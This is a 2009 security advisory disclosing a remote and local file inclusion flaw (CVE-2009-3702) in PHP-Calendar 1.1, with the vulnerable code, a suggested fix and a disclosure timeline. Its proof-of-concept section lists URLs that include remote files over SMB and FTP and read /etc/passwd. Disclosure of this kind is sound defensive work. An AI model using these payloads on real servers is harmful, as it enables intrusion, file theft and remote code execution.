[ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability

2009-12-21T00:00:00
ID SECURITYVULNS:DOC:22976
Type securityvulns
Reporter Securityvulns
Modified 2009-12-21T00:00:00

Description

============================================= INTERNET SECURITY AUDITORS ALERT 2009-011 - Original release date: October 13th, 2009 - Last revised: December 18th, 2009 - Discovered by: Juan Galiana Lara - CVE ID: CVE-2009-3702 - Severity: 8.5/10 (CVSS Base Score) =============================================

I. VULNERABILITY

PHP-Calendar v1.1 'configfile' Remote and Local File Inclusion vulnerability

II. BACKGROUND

PHP-Calendar is a simple web calendar. It is targeted towards groups that need to collaboratively create and track events. In that same collaborative spirit, the source for PHP-Calendar is available under an open source license for anyone to use and modify.

III. DESCRIPTION

The 'configfile' variable is not properly filtered, and is possible to include arbitrary remote and local files. This attack may lead to the execution of arbitrary code.

The snippet of vulnerable code (part of update08.php and update10.php file):

36  } elseif(!empty($_GET['configfile'])) {
37          if(file_exists($_GET['configfile'])) {
38                  require_once($_GET['configfile']);

In order to include remote files, the value 'On' in the allow_url_fopen directive is needed. There are two cases in which it is possible remote code execution due to bypass the file_exists function:

1) If the victim server is running Windows operating system and there is not a firewall filtering outgoing SMB requests, an attacker can use an URL like //servername/path/to/file.php 2) If server is running PHP version > 5.0.0 (the most common) an attacker can use FTP/FTPS protocol for inclusion. Like ftp://servername/path/to/file.php See references for more information.

IV. PROOF OF CONCEPT

For including remote files:

http://site/php-calendar-1.1/update08.php?configfile=//servername/path/to/file.php http://site/php-calendar-1.1/update08.php?configfile=ftp://guest:pass@site/path/to/file.php http://site/php-calendar-1.1/update10.php?configfile=\\ip\path\to\file.php http://site/php-calendar-1.1/update10.php?configfile=ftp://site/path/to/file.php

Local files, this PoC will show the /etc/passwd file:

http://site/php-calendar-1.1/update08.php?configfile=/etc/passwd http://site/php-calendar-1.1/update10.php?configfile=/etc/passwd

V. BUSINESS IMPACT

Unauthenticated users can view any local file in the filesystem and could execute arbitrary code remotely.

VI. SYSTEMS AFFECTED

PHP-Calendar version 1.1 is vulnerable, others may be affected

VII. SOLUTION

Change the code of update08.php (line 38) and update10.php (line 35) in order to filter $_GET['configfile'] variable.

if (ereg('^[a-zA-Z0-9_]+$', $_GET['configfile'])) require_once($_GET['configfile']);

III. REFERENCES

http://www.php-calendar.com/ http://www.php.net/manual/en/wrappers.ftp.php http://www.isecauditors.com/

IX. CREDITS

This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY

October 13, 2009: Initial release. October 19, 2009: Added CVE id. December 18, 2009: Last revision.

XI. DISCLOSURE TIMELINE

October 13, 2009: Vulnerability discovered by Internet Security Auditors (www.isecauditors.com) October 13, 2009: Sent to developers. No response. December 13, 2009: Contact again. No response. December 18, 2009: Added mitigation solution and sent to lists.

XII. LEGAL NOTICES

The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information.